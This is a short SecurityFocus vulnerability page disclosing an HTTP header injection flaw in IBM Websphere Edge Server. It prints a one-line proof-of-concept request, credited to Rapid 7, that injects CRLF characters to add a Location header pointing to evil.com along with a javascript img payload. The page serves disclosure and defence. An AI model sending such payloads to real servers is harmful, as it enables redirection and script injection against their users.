Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

IBM Websphere Edge Server HTTP Header Injection Vulnerability

The following proof of concept has been supplied by Rapid 7:

GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert
(document.domain)">HTTP/1.0







 

Privacy Statement
Copyright 2008, SecurityFocus